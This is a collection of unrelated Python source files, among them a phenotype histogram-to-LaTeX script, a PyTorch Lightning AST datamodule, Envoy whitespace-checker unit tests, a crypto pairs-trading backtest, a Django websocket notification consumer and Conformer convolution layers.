else:
xstr = str(x)
xstr = xstr[:xstr.index(".")+3]
return xstr
def summary2LaTeX(summary,output,suf,pheno):
phelab = pheno.replace("_",":")
lat = EOL+EOL+\
r"\begin{table}[hb]"+EOL+\
r"\begin{center}"+EOL+r"\begin{tabular}{l r D{.}{.}{3} D{.}{.}{3} D{.}{.}{4} D{.}{.}{4}} \\"+EOL + \
r"Data & Count & \multicolumn{1}{c}{Min} & \multicolumn{1}{c}{Max} & \multicolumn{1}{c}{Ave} & \multicolumn{1}{c}{StdDev} \\\hline" +EOL
for s in summary:
lat = lat+" & ".join([s[0]]+list(map(numfrm,[s[1].count(),s[1].min(),s[1].max(),s[1].mean(),s[1].std()])))+ r"\\"+EOL
lat = lat + r"\hline\end{tabular}"+EOL+r"\end{center}"+EOL+(r"""
*-caption{Overview of phenotype *-protect*-url{%s} distribution}
*-label{tab:overview:%s}
*-end{table}
""")%(pheno,phelab)
lat = r"""
A summary of the data for \url{%s} can be found in the Table~*-ref{tab:overview:%s}, transformed using
different transforms. A histogram is found in Figure \ref{fig:%s}.
""" + lat + r"""
\ourfig{fig:%s}{Histogram of *-protect*-url{%s} values under different transforms}{%s.%s}
"""
return lat%(pheno,phelab,output,output,pheno,output,suf)
def errorMessage10(phe):
print("""
A problem has been detected in file <%s> column <%s>.
There is some invalid data. I regret I can't tell you which row.
Please check -- the data should be numeric only.
If there is missing data, please use NA
"""%(args.input,phe))
def showPheno(pname,frm):
if args.skip_zero:
data = frm[frm[pname]>0][pname]
else:
data = frm[pname]
fig,axs = plt.subplots(2,2)
matplotlib.rcParams['xtick.labelsize']=13
matplotlib.rcParams['ytick.labelsize']=13
summary=[]
for r in range(2):
for c in range(2):
axs[r][c].set_xlabel(transform_names[r][c],fontsize=12)
axs[r][c].set_ylabel("Frequency",fontsize=12)
fn = transforms[r][c]
try:
pdata = fn(data) if fn != 1 else data
pdata = pdata[pdata.notnull()]
summary.append((transform_names[r][c],pdata))
except:
errorMessage10(pname)
sys.exit(10)
axs[r][c].hist(pdata,bins=100)
plt.tight_layout()
output = ("%s-%s"%(args.output,pname)).replace("_","-")
plt.savefig("%s.pdf"%output)
return summary2LaTeX(summary,output,"pdf",pname)
args=parseArguments()
frm = pd.read_csv(args.input,delim_whitespace=True)
phenos = args.phenos.split(",")
output_latex= ""
for phen in phenos:
dets = phen.split("/")
pname = dets[0]
output_latex = output_latex + showPheno(pname,frm)
g = open("%s.tex"%args.output,"w")
g.write(output_latex.replace("*-",chr(92)).replace("##",chr(36)))
g.close()
|
the-stack_106_23902 | from os import path
from os.path import basename
from typing import List, Optional, Tuple
import dgl
import torch
from commode_utils.common import download_dataset
from commode_utils.vocabulary import build_from_scratch
from omegaconf import DictConfig
from pytorch_lightning import LightningDataModule
from torch.utils.data import DataLoader
from embeddings_for_trees.data.jsonl_dataset import JsonlASTDataset, JsonlTypedASTDataset
from embeddings_for_trees.data.vocabulary import Vocabulary, TypedVocabulary
class JsonlASTDatamodule(LightningDataModule):
_train = "train"
_val = "val"
_test = "test"
def __init__(self, config: DictConfig, data_folder: str, is_pointer: bool = False):
super().__init__()
self._config = config
self._data_folder = data_folder
self._name = basename(self._data_folder)
self._vocabulary = self.setup_vocabulary()
self._is_pointer = is_pointer
def prepare_data(self):
if path.exists(self._data_folder):
print(f"Dataset is already downloaded")
return
if "url" not in self._config:
raise ValueError(f"Config doesn't contain url for, can't download it automatically")
download_dataset(self._config.url, self._data_folder, self._name)
def setup_vocabulary(self) -> Vocabulary:
if not path.exists(path.join(self._data_folder, Vocabulary.vocab_filename)):
print("Can't find vocabulary, collect it from train holdout")
build_from_scratch(path.join(self._data_folder, f"{self._train}.jsonl"), Vocabulary)
vocabulary_path = path.join(self._data_folder, Vocabulary.vocab_filename)
return Vocabulary(vocabulary_path, self._config.labels_count, self._config.tokens_count)
@staticmethod
def _collate_batch(sample_list: List[Tuple[torch.Tensor, dgl.DGLGraph]]) -> Tuple[torch.Tensor, dgl.DGLGraph]:
labels, graphs = zip(*filter(lambda sample: sample is not None, sample_list))
return torch.cat(labels, dim=1), dgl.batch(graphs)
def _shared_dataloader(self, holdout: str, shuffle: bool) -> DataLoader:
if self._vocabulary is None:
raise RuntimeError(f"Setup vocabulary before creating data loaders")
holdout_file = path.join(self._data_folder, f"{holdout}.jsonl")
dataset = JsonlASTDataset(
holdout_file, self._vocabulary, self._config, holdout == self._train, self._is_pointer
)
batch_size = self._config.batch_size if holdout == self._train else self._config.test_batch_size
return DataLoader(
dataset, batch_size, shuffle=shuffle, num_workers=self._config.num_workers, collate_fn=self._collate_batch
)
def train_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._train, True)
def val_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._val, False)
def test_dataloader(self, *args, **kwargs) -> DataLoader:
return self._shared_dataloader(self._test, False)
def transfer_batch_to_device(
self, batch: Tuple[torch.Tensor, dgl.DGLGraph], device: torch.device, dataloader_idx: int
) -> Tuple[torch.Tensor, dgl.DGLGraph]:
return batch[0].to(device), batch[1].to(device)
@property
def vocabulary(self) -> Vocabulary:
if self._vocabulary is None:
raise RuntimeError(f"Setup data module for initializing vocabulary")
return self._vocabulary
class JsonlTypedASTDatamodule(JsonlASTDatamodule):
_vocabulary: TypedVocabulary
@property
def vocabulary(self) -> TypedVocabulary:
if self._vocabulary is None:
raise RuntimeError(f"Setup data module for initializing vocabulary")
return self._vocabulary
def setup_vocabulary(self) -> TypedVocabulary:
if not path.exists(path.join(self._data_folder, Vocabulary.vocab_filename)):
print("Can't find vocabulary, collect it from train holdout")
build_from_scratch(path.join(self._data_folder, f"{self._train}.jsonl"), TypedVocabulary)
vocabulary_path = path.join(self._data_folder, Vocabulary.vocab_filename)
return TypedVocabulary(
vocabulary_path, self._config.labels_count, self._config.tokens_count, self._config.types_count
)
def _shared_dataloader(self, holdout: str, shuffle: bool) -> DataLoader:
if self._vocabulary is None:
raise RuntimeError(f"Setup vocabulary before creating data loaders")
holdout_file = path.join(self._data_folder, f"{holdout}.jsonl")
dataset = JsonlTypedASTDataset(
holdout_file, self._vocabulary, self._config, holdout == self._train, self._is_pointer
)
batch_size = self._config.batch_size if holdout == self._train else self._config.test_batch_size
return DataLoader(
dataset, batch_size, shuffle=shuffle, num_workers=self._config.num_workers, collate_fn=self._collate_batch
)
|
the-stack_106_23904 | # (C) 2019 Baris Ozmen <[email protected]>
import pathlib
import logging
import os
import datetime
import sys
from os.path import dirname, realpath
file_path = realpath(__file__)
dir_of_file = dirname(file_path)
parent_dir_of_file = dirname(dir_of_file)
sys.path.insert(0, dir_of_file)
now = datetime.datetime.now()
EXPERIMENT_NAME = (
f"wrn_28_10_{now.year}-{now.month:02}-{now.day:02}_{now.hour:02}-{now.minute:02}"
)
EXPERIMENT_FOLDER_PATH = os.path.join(
parent_dir_of_file, f"reports/experiments/{EXPERIMENT_NAME}"
)
log_path = pathlib.Path(EXPERIMENT_FOLDER_PATH)
log_path.mkdir(parents=True, exist_ok=True)
logging.basicConfig(filename=(log_path / "info.log").absolute(), level=logging.DEBUG)
from childcnn import ChildCNN
from build_features import DataOp
from lib.decorators import Reporter
from image_generator import deepaugment_image_generator
logger = Reporter.logger
from keras.callbacks import CSVLogger
import click
from sklearn.model_selection import train_test_split
import logging
# @click.command()
# @click.option("--dataset-name", type=click.STRING, default="cifar10")
# @click.option("--num-classes", type=click.INT, default=10)
# @click.option("--epochs", type=click.INT, default=15)
# @click.option("--batch-size", type=click.INT, default=64)
# @click.option("--policies-path", type=click.STRING, default="dont_augment")
@logger(logfile_dir=EXPERIMENT_FOLDER_PATH)
def run_full_model(images, labels, test_proportion=0.1, model="wrn_28_10", epochs=200, batch_size=64, policies_path="dont_augment"):
data={}
data["X_train"], data["X_val"], data["y_train"], data["y_val"] = train_test_split(images, labels, test_size=test_proportion, shuffle=True)
data = DataOp.preprocess_normal(data)
input_shape = data["X_train"][0].shape
num_classes = data["y_train"].shape[1]
cnn_config={
"model" : model,
"weights" : "imagenet",
"input_shape" : input_shape,
"child_batch_size" : batch_size,
"pre_augmentation_weights_path" : "initial_model_weights.h5",
"logging" : logging
}
full_model = ChildCNN(
input_shape=input_shape,
num_classes=num_classes,
config=cnn_config
)
if policies_path == "dont_augment":
policy_str = "non_augmented"
else:
policy_str = "augmented"
csv_logger = CSVLogger(
f"{EXPERIMENT_FOLDER_PATH}/wrn_28_10_training_on_{policy_str}.csv"
)
if policies_path == "dont_augment":
history = full_model.fit_normal(data, epochs=epochs, csv_logger=csv_logger)
print(f"Reached validation accuracy is {history['val_acc'][-1]}")
else:
datagen = deepaugment_image_generator(
data["X_train"],
data["y_train"],
policies_path,
batch_size=batch_size,
augment_chance=0.8,
)
print("fitting the model")
history = full_model.fit_with_generator(
datagen,
data["X_val"],
data["y_val"],
train_data_size=len(data["X_train"]),
epochs=epochs,
csv_logger=csv_logger,
)
print(f"Reached validation accuracy is {history['val_acc'][-1]}")
if __name__ == "__main__":
run_full_model()
|
the-stack_106_23905 |
import types
from unittest.mock import AsyncMock, MagicMock, PropertyMock
import pytest
from aio.core import directory
from envoy.code import check
async def test_glint_have_newlines(patches):
patched = patches(
"NewlineChecker",
prefix="envoy.code.check.abstract.glint")
path = MagicMock()
paths = [MagicMock() for i in range(0, 3)]
with patched as (m_newlines, ):
assert (
check.AGlintCheck.have_newlines(path, *paths)
== m_newlines.return_value.have_newlines.return_value)
assert (
m_newlines.call_args
== [(path, ), {}])
assert (
m_newlines.return_value.have_newlines.call_args
== [(tuple(paths), ), {}])
def test_glint_constructor():
glint = check.AGlintCheck("DIRECTORY")
assert glint.directory == "DIRECTORY"
@pytest.mark.parametrize("files", [True, False])
async def test_glint_checker_files(patches, files):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
"set",
("AGlintCheck.noglint_re",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
files = AsyncMock(return_value=range(0, 20))
directory.files = files()
with patched as (m_set, m_re):
m_re.return_value.match.side_effect = lambda x: x % 2
assert (
await glint.checker_files
== m_set.return_value)
iterator = m_set.call_args[0][0]
called = list(iterator)
assert (
called
== [x for x in range(0, 20)
if not x % 2])
assert (
m_re.return_value.match.call_args_list
== [[(x, ), {}] for x in range(0, 20)])
assert not (
hasattr(
glint,
check.AGlintCheck.checker_files.cache_name))
async def test_glint_files_with_mixed_tabs(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files_with_preceeding_tabs",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_tabs, ):
tabs = AsyncMock()
m_tabs.side_effect = tabs
assert (
await glint.files_with_mixed_tabs
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lP", r"^ "], ),
dict(target=tabs.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_mixed_tabs.cache_name))
async def test_glint_files_with_preceeding_tabs(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_files, ):
files = AsyncMock()
m_files.side_effect = files
assert (
await glint.files_with_preceeding_tabs
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lP", r"^\t"], ),
dict(target=files.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_preceeding_tabs.cache_name))
async def test_glint_files_with_no_newline(patches):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
"partial",
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
"AGlintCheck.execute_in_batches",
"AGlintCheck.have_newlines",
prefix="envoy.code.check.abstract.glint")
batched = [
set(x for x in range(0, 10)),
set(x for x in range(1, 7)),
set(x for x in range(5, 13))]
expected = batched[0] | batched[1] | batched[2]
async def batch_iter(x):
for batch in batched:
yield batch
with patched as (m_partial, m_files, m_execute, m_newlines):
m_files.side_effect = AsyncMock(
[f"FILE{i}" for i in range(0, 5)])
m_execute.side_effect = batch_iter
assert (
await glint.files_with_no_newline
== expected)
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_no_newline.cache_name))
assert (
m_execute.call_args
== [(m_partial.return_value, *m_files.return_value), {}])
assert (
m_partial.call_args
== [(m_newlines, directory.path), {}])
async def test_glint__check_problems(patches):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"list",
"AGlintCheck._check_path",
prefix="envoy.code.check.abstract.glint")
batched = [
set(x for x in range(0, 10)),
set(x for x in range(1, 7)),
set(x for x in range(5, 13))]
expected = batched[0] | batched[1] | batched[2]
with patched as (m_list, m_check):
assert (
await glint._check_problems(batched)
== {p: m_list.return_value
for p in expected})
assert (
m_list.call_args_list
== [[(m_check.return_value, ), {}]
for p
in expected])
assert (
m_check.call_args_list
== [[(p, *batched), {}]
for p
in expected])
@pytest.mark.parametrize("files", [[], [f"F{i}" for i in range(0, 5)]])
async def test_glint_files_with_trailing_whitespace(patches, files):
directory = MagicMock()
glint = check.AGlintCheck(directory)
patched = patches(
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
prefix="envoy.code.check.abstract.glint")
directory.grep = AsyncMock()
with patched as (m_files, ):
files = AsyncMock()
m_files.side_effect = files
assert (
await glint.files_with_trailing_whitespace
== directory.grep.return_value)
assert (
directory.grep.call_args
== [(["-lE", r"[[:blank:]]$"], ),
dict(target=files.return_value)])
assert not (
hasattr(
glint,
check.AGlintCheck.files_with_trailing_whitespace.cache_name))
def test_glint_noglint_re(patches):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"re",
prefix="envoy.code.check.abstract.glint")
with patched as (m_re, ):
assert (
glint.noglint_re
== m_re.compile.return_value)
assert (
m_re.compile.call_args
== [("|".join(check.abstract.glint.NOGLINT_RE), ),
{}])
assert "noglint_re" in glint.__dict__
@pytest.mark.parametrize("files", [True, False])
async def test_glint_problem_files(patches, files):
glint = check.AGlintCheck("DIRECTORY")
patched = patches(
"asyncio",
("AGlintCheck.files",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_no_newline",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_mixed_tabs",
dict(new_callable=PropertyMock)),
("AGlintCheck.files_with_trailing_whitespace",
dict(new_callable=PropertyMock)),
"AGlintCheck._check_problems",
prefix="envoy.code.check.abstract.glint")
with patched as patchy:
(m_asyncio, m_files, m_newline, m_tabs,
m_ws, m_checks) = patchy
m_files.side_effect = AsyncMock(return_value=files)
gather = AsyncMock()
m_asyncio.gather = gather
assert (
await glint.problem_files
== (m_checks.return_value
if files
else {})
== getattr(
glint,
check.AGlintCheck.problem_files.cache_name)[
"problem_files"])
if not files:
assert not m_checks.called
assert not gather.called
assert not m_newline.called
assert not m_tabs.called
assert not m_ws.called
return
assert (
m_checks.call_args
== [(gather.return_value, ), {}])
assert (
gather.call_args
== [(m_newline.return_value,
m_tabs.return_value,
m_ws.return_value), {}])
@pytest.mark.parametrize(
"newline", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
@pytest.mark.parametrize(
"mixed_tabs", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
@pytest.mark.parametrize(
"whitespace", [[], ["PATH", "other"], ["PATH"], ["no", "path"]])
def test_glint__check_path(patches, newline, mixed_tabs, whitespace):
glint = check.AGlintCheck("DIRECTORY")
expected = []
if "PATH" in newline:
expected.append("Missing final newline: PATH")
if "PATH" in mixed_tabs:
expected.append("Mixed preceeding tabs and whitespace: PATH")
if "PATH" in whitespace:
expected.append("Trailing whitespace: PATH")
assert (
list(glint._check_path("PATH", newline, mixed_tabs, whitespace))
== expected)
def test_glint_newline_checker_constructor():
nl_checker = check.abstract.glint.NewlineChecker("PATH")
assert isinstance(nl_checker, directory.IDirectoryContext)
assert isinstance(nl_checker, directory.ADirectoryContext)
@pytest.mark.parametrize("n", range(1, 5))
def test_glint_newline_checker_have_newlines(patches, n):
nl_checker = check.abstract.glint.NewlineChecker("PATH")
patched = patches(
"set",
("NewlineChecker.in_directory",
dict(new_callable=PropertyMock)),
"utils",
prefix="envoy.code.check.abstract.glint")
paths = [MagicMock() for x in range(0, 5)]
class Byter:
counter = 0
def last_n_bytes_of(self, target):
self.counter += 1
if self.counter % n:
return b"\n"
return "OTHER"
byter = Byter()
with patched as (m_set, m_dir_ctx, m_utils):
m_utils.last_n_bytes_of.side_effect = byter.last_n_bytes_of
assert (
nl_checker.have_newlines(paths)
== m_set.return_value)
pathgen = m_set.call_args[0][0]
assert isinstance(pathgen, types.GeneratorType)
assert (
list(pathgen)
== [p
for i, p
in enumerate(paths)
if not bool((i + 1) % n)])
assert m_dir_ctx.return_value.__enter__.called
assert (
m_utils.last_n_bytes_of.call_args_list
== [[(p, ), {}]
for p in paths])
|
the-stack_106_23906 | import sys, os
myPath = os.path.dirname(os.path.abspath(__file__))
sys.path.insert(0, myPath + '/../')
import torch
from torch import nn
from torch.optim import Adam
from torch.nn.init import xavier_normal as xavier
import matplotlib.pyplot as plt
from data.loader import cryptoData
from models.model import MLPRegressor
DEVICE = torch.device("cpu")
COIN1 = "eth"
COIN2 = "btc"
MODEL = "norm"
class Residual(object):
def __init__(self,dataloader_coin1,dataloader_coin2):
self.dataloader_coin1 = dataloader_coin1
self.dataloader_coin2 = dataloader_coin2
def zScore(self,upperIndex,out_coin1,out_coin2):
coin1_30 = self.dataloader_coin1.getDataFrame(upperIndex,20)
coin2_30 = self.dataloader_coin2.getDataFrame(upperIndex,20)
coin1_30 = torch.cat((coin1_30,out_coin1))
coin2_30 = torch.cat((coin2_30,out_coin2))
meanDiffernce30 = torch.mean(coin1_30-coin2_30)
standardDev30 = torch.std(coin1_30-coin2_30)
coin1_5 = self.dataloader_coin1.getDataFrame(upperIndex,5)
coin2_5 = self.dataloader_coin2.getDataFrame(upperIndex,5)
coin1_5 = torch.cat((coin1_5,out_coin1))
coin2_5 = torch.cat((coin2_5,out_coin2))
meanDiffernce5 = torch.mean(coin1_5-coin2_5)
if standardDev30 > 0:
return (meanDiffernce5 - meanDiffernce30)/standardDev30, self.riskModel(coin1_30,coin2_30)
else:
return 0, self.riskModel(coin1_30,coin2_30)
def riskModel(self,coin1_30,coin2_30):
c1 = coin1_30 - coin1_30.mean()
c2 = coin2_30 - coin2_30.mean()
corr = torch.sum(c1*c2) / (torch.sqrt(torch.sum(c1 ** 2)) * torch.sqrt(torch.sum(c2 ** 2)))
if corr > 0.9:
risk = False
else:
risk = True
return risk
def getGeneralTrends(dataloader,upperIndex):
upper = dataloader.getDataFrame(upperIndex,10).mean()
lower = dataloader.getDataFrame(upperIndex,30).mean()
return upper/lower
def main(COIN1,COIN2):
model_coin1 = MLPRegressor(coin=COIN1,model= MODEL)
model_coin1.to(DEVICE)
model_coin2 = MLPRegressor(coin=COIN2,model= MODEL)
model_coin2.to(DEVICE)
dataloader_coin1 = cryptoData(COIN1,DEVICE=DEVICE,model=MODEL)
DAYS_coin1 = len(dataloader_coin1)
dataloader_coin2 = cryptoData(COIN2,DEVICE=DEVICE,model=MODEL)
DAYS_coin2 = len(dataloader_coin2)
model_coin1.eval(dataloader_coin1[0][0])
model_coin2.eval(dataloader_coin2[0][0])
residualModel = Residual(dataloader_coin1,dataloader_coin2)
coin1_amt = 0
coin2_amt = 0
cash = 0
startDay = 34
trendThreshold = 1
shorts = longs = holds = 0
time = 0
for i in range(startDay,min(DAYS_coin1,DAYS_coin2)):
time+=1
x_coin1,target_coin1 = dataloader_coin1[i]
x_coin2,target_coin2 = dataloader_coin2[i]
price_coin1 = dataloader_coin1.getDataFrame(i,1)
price_coin2 = dataloader_coin2.getDataFrame(i,1)
if i == startDay:
coin1_amt = 5000/ price_coin1
coin2_amt = 5000/ price_coin2
out_coin1 = model_coin1(x_coin1)
out_coin2 = model_coin2(x_coin2)
zScore, risk = residualModel.zScore(i,out_coin1,out_coin2)
trend_coin1 = getGeneralTrends(dataloader_coin1,i)
trend_coin2 = getGeneralTrends(dataloader_coin2,i)
if not risk:
if zScore > 1:
shorts+=1
if trend_coin2 > trendThreshold:
temp = coin1_amt* price_coin1
coin1_amt = 0
coin2_amt += (temp / price_coin2)
# print("\t",i,"Transaction: short at ",price_coin1.item(),price_coin2.item())
elif zScore < -1:
longs+=1
if trend_coin1 > trendThreshold:
temp = coin2_amt* price_coin2
coin2_amt = 0
coin1_amt += (temp / price_coin1)
# print("\t",i,"Transaction: long at ",price_coin1.item(),price_coin2.item())
else:
holds+=1
out_coin1 = out_coin1.item()*dataloader_coin1.pmax.item()
out_coin2 = out_coin2.item()*dataloader_coin2.pmax.item()
print(COIN1,COIN2,"\n\t",(coin1_amt * price_coin1) + (coin2_amt * price_coin2) + cash)
print(time,'\n')
if __name__ == "__main__":
main("eth","btc")
main("eth","ltc")
main("ltc","btc") |
the-stack_106_23909 | import binascii
import ctypes
import json
import logging
import traceback
from datetime import date, datetime, timedelta
from pathlib import Path
from channels.db import database_sync_to_async
from channels.generic.websocket import WebsocketConsumer
from django.core.exceptions import ObjectDoesNotExist
from django.utils import timezone
from notif.models import Notification
from notif.models_serializers import NotificationSerializer
from rest_framework.authtoken.models import Token
logger = logging.getLogger("notif")
class PushNotifConsumer(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.token: str = None
self.user = None
def connect(self):
try:
self.accept()
self.token = self.scope["url_route"]["kwargs"]["token"]
db_tok = Token.objects.get(key=self.token)
self.user = db_tok.user
self.user.settings.push_channel = self.channel_name
self.user.settings.save()
logger.info("Accepted")
except Exception as e:
print(traceback.print_exc())
logging.error(traceback.format_exc())
def disconnect(self, close_code):
try:
self.user.settings.push_channel = None
self.user.settings.save()
except Exception as e:
print(traceback.format_exc())
logging.error(traceback.format_exc())
def receive(self, text_data):
event = json.loads(text_data)
logger.info("{} >> {}".format(self.user, text_data))
event_handler = getattr(self, event["type"].lower().replace(".", "_"), None)
if callable(event_handler):
event_handler(event)
def notify(self, data: dict):
self.send(json.dumps(data))
def notification(self, data: dict):
self.send(json.dumps(data))
def unread(self, event: dict):
notifs = Notification.objects.filter(user=self.user, read__isnull=True)
event["count"] = len(notifs)
event["notifications"] = NotificationSerializer(notifs, many=True).data
self.send(json.dumps(event))
def markread(self, event: dict):
notifs = Notification.objects.filter(user=self.user, read__isnull=True)
notifs.update(read=timezone.now())
event["success"] = True
self.send(json.dumps(event))
|
the-stack_106_23910 | import torch
import torch.nn as nn
import torch.nn.init as init
import torch.nn.functional as F
import math
class Conv2dSubsampling(nn.Module):
def __init__(self, input_dim, output_dim, dropout=0.0):
"""
:param input_dim: the log mel feature (normally 40)
:param output_dim: network size (512)
:param dropout: dropout rate
"""
super(Conv2dSubsampling, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
# first conv is nn.Conv2d(1, output_dim, 3, 2)
# secnd conv is nn.Conv2d(output_dim, odin, 3, 2)
self.in_conv_weight = nn.Parameter(torch.Tensor(output_dim, 1, 3, 3))
self.in_conv_bias = nn.Parameter(torch.Tensor(output_dim))
self.in_stride = 2
self.out_conv_weight = nn.Parameter(torch.Tensor(output_dim, output_dim, 3, 3))
self.out_conv_bias = nn.Parameter(torch.Tensor(output_dim))
self.out_stride = 2
cnn_feature_size = output_dim * (((input_dim - 1) // 2 - 1) // 2)
self.out_weight = nn.Parameter(torch.Tensor(output_dim, cnn_feature_size))
self.out_bias = nn.Parameter(torch.Tensor(output_dim))
self.dropout = dropout
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_uniform_(self.in_conv_weight, a=math.sqrt(5))
nn.init.kaiming_uniform_(self.out_conv_weight, a=math.sqrt(5))
fan_in, _ = init._calculate_fan_in_and_fan_out(self.in_conv_weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.in_conv_bias, -bound, bound)
fan_in, _ = init._calculate_fan_in_and_fan_out(self.out_conv_weight)
bound = 1 / math.sqrt(fan_in)
init.uniform_(self.out_conv_bias, -bound, bound)
std_ = math.sqrt(2.0 / (self.output_dim + self.output_dim))
nn.init.normal_(self.out_weight, 0.0, std_)
nn.init.constant_(self.out_bias, 0.)
return
def forward(self, input, input_mask):
"""
:param input: [bsz x seq_len x input_size]
:param input_mask: [bsz x seq_len]
:return:
"""
input = input.unsqueeze(1) # [bsz x 1 x seq_len x input_size]
# padding = 0, dilation = 1, groups = 1
input = F.conv2d(input, self.in_conv_weight, self.in_conv_bias, self.in_stride, 0, 1, 1)
input = F.relu(input)
input = F.conv2d(input, self.out_conv_weight, self.out_conv_bias, self.out_stride, 0, 1, 1)
input = F.relu(input)
b, c, t, f = input.size()
input = input.transpose(1, 2).contiguous().view(b, t, c * f)
input = F.linear(input, self.out_weight, self.out_bias)
# input = F.dropout(input, p=self.dropout, training=self.training)
mask = input_mask[:, :-2:2][:, :-2:2]
return input, mask
class ConformerConvBlock(nn.Module):
def __init__(self, channels, kernel_size, activation=nn.ReLU(), bias=True):
super(ConformerConvBlock, self).__init__()
assert (kernel_size - 1) % 2 == 0
self.pointwise_conv1 = nn.Conv1d(channels, 2*channels, kernel_size=1, stride=1, padding=0, bias=bias)
self.depthwise_conv = nn.Conv1d(channels, channels, kernel_size, stride=1,
padding=(kernel_size - 1) // 2, groups=channels, bias=bias)
self.batch_norm = nn.BatchNorm1d(channels)
self.pointwise_conv2 = nn.Conv1d(channels, channels, kernel_size=1, stride=1, padding=0, bias=bias)
self.activation = activation
# self.in_pointwise_weight = nn.Conv1d(channels, 2*channels, kernel_size=1, stride=1, padding=0, bias=False)
# self.in_pointwise_bias = nn.Parameter(torch.Tensor(2 * channels))
#
# self.depthwise_weight = nn.Parameter(torch.Tensor(channels, channels // channels, kernel_size))
# self.depthwise_bias = nn.Parameter(torch.Tensor(channels))
# self.padding = (kernel_size - 1) // 2
# self.groups = channels
#
# self.norm = nn.BatchNorm1d(channels)
# self.out_pointwise_weight = nn.Parameter(torch.Tensor(channels, channels, 1))
# self.out_pointwise_bias = nn.Parameter(torch.Tensor(channels))
#
# self.activation = activation
self.reset_parameters()
def reset_parameters(self):
nn.init.kaiming_normal_(self.pointwise_conv1.weight, nonlinearity='relu')
nn.init.kaiming_normal_(self.depthwise_conv.weight, nonlinearity='relu')
nn.init.kaiming_normal_(self.pointwise_conv2.weight, nonlinearity='relu')
nn.init.constant_(self.pointwise_conv1.bias, 0)
nn.init.constant_(self.pointwise_conv2.bias, 0)
nn.init.constant_(self.depthwise_conv.bias, 0)
# nn.init.kaiming_uniform_(self.in_pointwise_weight, a=math.sqrt(5))
# nn.init.kaiming_uniform_(self.depthwise_weight, a=math.sqrt(5))
# nn.init.kaiming_uniform_(self.out_pointwise_weight, a=math.sqrt(5))
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.in_pointwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.in_pointwise_bias, -bound, bound)
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.depthwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.depthwise_bias, -bound, bound)
#
# fan_in, _ = init._calculate_fan_in_and_fan_out(self.out_pointwise_weight)
# bound = 1 / math.sqrt(fan_in)
# init.uniform_(self.out_pointwise_bias, -bound, bound)
def forward(self, x, pad_mask=None):
"""
:param pad_mask: [seq_len x bsz] indicating which element is correct
(this should be the same with the attention mask (pad=1, unpad=0)
:param x: [seq_len x bsz x hidden_size]
:return:
"""
x = x.transpose(0, 1).transpose(1, 2) # to [bsz x hidden_size x seq_len]
# pointwise conv does not need to mask because its elementwise projection
x = self.pointwise_conv1(x)
x = F.glu(x, dim=1)
# if pad_mask is not None:
# pad_mask = pad_mask.transpose(0, 1).transpose(1, 2)
# # print(x.size(), pad_mask.size())
# x = x.masked_fill_(pad_mask, 0)
x = self.depthwise_conv(x)
x = self.activation(self.batch_norm(x))
x = self.pointwise_conv2(x)
# x = F.conv1d(x, self.in_pointwise_weight, self.in_pointwise_bias, 1, 0, 1, 1)
# x = F.glu(x, dim=1)
#
# x = F.conv1d(x, self.depthwise_weight, self.depthwise_bias, 1, self.padding, 1, self.groups)
# x = self.activation(x)
#
# x = F.conv1d(x, self.out_pointwise_weight, self.out_pointwise_bias, 1, 0, 1, 1)
x = x.transpose(1, 2).transpose(0, 1) # back to [seq_len x bsz x hidden_size]
return x
if __name__ == "__main__":
bsz = 160
seq_len = 1000
input_size = 48
output_size = 128
kernel = 31
subsampler = Conv2dSubsampling(input_size, output_size)
subsampler = subsampler.cuda()
conv = ConformerConvBlock(output_size, kernel)
conv = conv.cuda()
input = torch.randn(seq_len, bsz, input_size)
mask = torch.randn(bsz, seq_len)
input = input.cuda()
mask = mask.cuda()
input, mask = subsampler(input.transpose(0, 1), mask)
print(input.size())
print(mask.size())
output = conv(input.transpose(0, 1))
print(output.size())
|
the-stack_106_23913 | from arches.app.models.system_settings import settings
from arches.app.utils.betterJSONSerializer import JSONSerializer
from arches.app.search.components.base import BaseSearchFilter
details = {
"searchcomponentid": "",
"name": "Saved",
"icon": "fa fa-bookmark",
"modulename": "saved_searches.py",
"classname": "SavedSearches",
"type": "popup",
"componentpath": "views/components/search/saved-searches",
"componentname": "saved-searches",
"sortorder": "2",
"enabled": True,
}
class SavedSearches(BaseSearchFilter):
def view_data(self):
ret = {}
ret["saved_searches"] = settings.SAVED_SEARCHES
return ret
|
the-stack_106_23914 | import pytest
from literature.crud.editor_crud import create, show, patch, destroy, show_changesets
from sqlalchemy import create_engine
from sqlalchemy import MetaData
# from literature import models
from literature.models import (
Base, EditorModel
)
from literature.schemas import EditorSchemaPost
from literature.database.config import SQLALCHEMY_DATABASE_URL
from sqlalchemy.orm import sessionmaker
